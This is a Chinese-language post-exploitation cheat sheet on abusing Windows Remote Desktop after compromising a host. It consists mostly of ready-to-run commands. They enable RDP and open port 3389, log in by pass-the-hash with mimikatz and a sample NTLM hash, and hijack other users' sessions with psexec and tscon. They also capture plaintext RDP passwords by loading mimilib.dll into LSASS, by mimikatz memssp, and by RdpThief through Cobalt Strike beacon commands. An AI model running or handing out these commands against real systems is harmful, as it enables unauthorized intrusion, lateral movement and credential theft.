后渗透-Windows远程桌面
查看是否开启远程桌面
0x1表示关闭;0x0表示开启
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
image.png
查看远程桌面的端口号
得到的结果为16进制格式
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
image.png
开启/关闭远程桌面
- 开启
meterpreter > run post/windows/manage/enable_rdp
image.png
- 关闭
meterpreter > run multi_console_command -r /root/.msf4/loot/20191203031341_default_192.168.80.132_host.windows.cle_476697.txt
image.png
修改防火墙允许3389端口通过
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
image.png
开启多用户登录
1.mimikatz支持安装补丁实现多用户登录,但是重启后会失效
- 使用与原系统相同的账户,原系统还是会被切换到登录界面
- 使用与原系统不同的账户,可成功登录
privilege::debug
ts::multirdp
image.png
2.安装rdpwrap实现多用户登录
地址:https://github.com/stascorp/rdpwrap
install.bat 安装
uninstall.bat 卸载
image.png
使用hash登录windows远程桌面
适用于Windows 10和Server 2012系统;Windows 7和Server 2008默认不支持,需要安装2871997、2973351补丁。
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:192.168.80.246 /ntlm:32ed87bdb5fdc5e9cba88547376818d4 "/run:mstsc.exe /restrictedadmin"
image.png
如果登录时有如下提示,可通过修改注册表解决
image.pngbeacon> shell REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
利用tscon登录任意用户的远程桌面
- 比如我们获得了一台administrator权限的服务器
- 首先使用psexec获得system权限
psexec64.exe -i -s cmd.exe
image.png
- 接下来查看当前有哪些用户在线
query user
image.png
- 最后切换到会话2的远程桌面
tscon 2
image.png
获取远程桌面的历史记录以及保存的账号密码
meterpreter > run post/windows/gather/enum_termserv
image.png
https://www.nirsoft.net/utils/network_password_recovery.html
image.png
ssp密码记录
记录rdp登入到当前系统时,输入的明文账号密码。
方法一:需要重启才能生效
自定义一个dll,例如mimikatz中的mimilib.dll,在系统启动时,加载到lsass.exe进程中
- 首先将mimilib.dll复制到c:\windows\system32目录下
copy mimilib.dll c:\windows\system32
- 然后添加mimilib.dll到注册表
reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\ /v "Security Packages"
reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\ /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f
- 有人登录时,密码会保存在C:\Windows\System32\kiwissp.log
方法二:利用mimikatz进程注入,无需重启即可生效,但重启后会失效
mimikatz privilege::debug
mimikatz misc::memssp
type C:\Windows\System32\mimilsa.log
RdpThief
记录在当前系统rdp登出时,输入的明文账号密码。
https://github.com/0x09AL/RdpThief.git
beacon> rdpthief_enable
beacon> rdpthief_dump
beacon> rdpthief_disable
image.png
参考:
https://laucyun.com/17f97e47b62717fb9b36750723aa861d.html
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Pass-the-Hash-with-Remote-Desktop/
https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E4%BB%8E%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%8F%90%E5%8F%96%E6%98%8E%E6%96%87%E5%87%AD%E6%8D%AE/
https://www.cnblogs.com/zpchcbd/p/11865633.html